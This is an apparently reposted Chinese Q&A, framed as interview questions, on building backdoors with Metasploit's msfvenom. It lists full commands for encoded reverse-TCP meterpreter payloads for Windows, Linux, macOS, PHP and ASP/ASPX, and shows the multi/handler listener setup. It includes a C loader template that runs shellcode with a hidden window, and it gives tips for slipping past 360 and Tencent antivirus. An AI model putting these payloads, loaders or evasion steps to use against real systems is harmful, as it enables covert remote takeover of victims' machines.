MSF后门生成模块 面试考题
Posted 安全界 的彭于晏
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MSF后门生成模块 面试考题相关的知识,希望对你有一定的参考价值。
1. 后门生成模块的作用是什么?
维持访问,持续控制
2. MsFvenom支持生成的脚本有哪些?
使用命令:MsFvenom -l formats查看支持的脚本列表
3. 如何查看msfvenom支持的payload?
使用命令:msfvenom -l payloads查看支持的payload
4. 如何查看msfvenom支持的编码器?
使用命令:msfvenom -l encoders查看支持的所有编码器
5. Msfvenom -b 参数的作用是什么?
删除生成shellcode中的一些无法字符
6. 什么是shellcode?
Shellcode也就是利用代码
7. Msfvenom -i参数的作用是什么?
支持编码次数,也就是类似于加密的多少次
8. Msfvenom导出生成的脚本的方式有那种?
我们可以使用-o参数,或者是“>>”导出文件名
9. 在生成木马脚本的时候指定目标系统和目标架构的作用是什么?
生成的脚本的准确性,有些脚本我们生成之后可能无法在对方系统运行
10. Msfvenom生成后门文件的流程是什么?
1.生成后门文件在对方主机上执行或者触发 2.本地监控设置的端口,然后对方上线即可控制对方主机
11. “msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.88.134 lport=1250 -f exe > 2301.exe ” 这句代码的意思是什么?
使用msfvenom创建木马文件,-p指定payload为windows/meterpreter/reverse_tcp,-e 指定编码器为x86/shikata_ga_nai,-i指定编码次数为5,设置本地IP地址和端口,-f指定导出文件类型,> 导出为2301.exe文件
12. 在监听的时候我们使用什么模块?
使用模块:use exploit/multi/handler
13. 在监听的时候我们应该注意什么?
当我们选择了监听模块,然后呢,设置payload的时候要注意使用对应的payload,也就是我们生成木马文件所使用的payload
14. 常见的后门生成模式有哪些?
根据需求来,一般来说有php,asp,Windows,linux,mac,powershell等等。
15. 常见的后门生成例子?
1. Windows
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\\back.exe
Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\\back.exe
2. Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
3. MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
4. PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
5. Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
6. Aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
16. 安装vc++6.0的作用是什么?
编译我们的C语言的数组,编译成exe可执行文件
17. 如何生成C语言数组的后门?
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\\x00’ lhost=192.168.88.134 lport=1250 -f c
指定文件格式为c语言即可或是 -o 导出保存为c语言的脚本文件
18. 如何使用Vc++6.0编译我们所生成的C语言数组文件?
#1. 创建一个C语言项目:打开软件 – 文件 -新建 - win32 application -一个简单的32为C语言程序
#2. 找到左下角的fileview,source files目录修改你创建的名字的.cpp程序
#3. 复制:编译文件内容:
#include "stdafx.h"
#include <stdio.h>
#pragma comment( linker, "/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"")
unsigned char buf[] =
(这里放生成好的数组)
main()
{
((void(*)(void))&buf)();
}
#4. 然后组建 – 先编译stdafx.cpp文件,在编译你的.cpp,生成木马
#5. 然后扫描测试即可
19. 绕过360软件的思路是什么?
通过msfvenom所生成的C语言,然后编译,这样的话,特征就被去掉了。然后绕过
20. 绕过腾讯管家的思路是什么?
通过添加资源文件来改变特征码,从而去绕过,如果被查杀了,那么我们就添加一些东西,例如签名,版权,图标等等信息
21. 第一次绕过了,为什么第二次会被拦截?
因为,你上传过你的木马后门,然后防护软件进行分析,
然后第二次你同样去做,就会拦截了。这是不断对抗的,
所以方式方法不一定只有一种,会有多种
以上是关于MSF后门生成模块 面试考题的主要内容,如果未能解决你的问题,请参考以下文章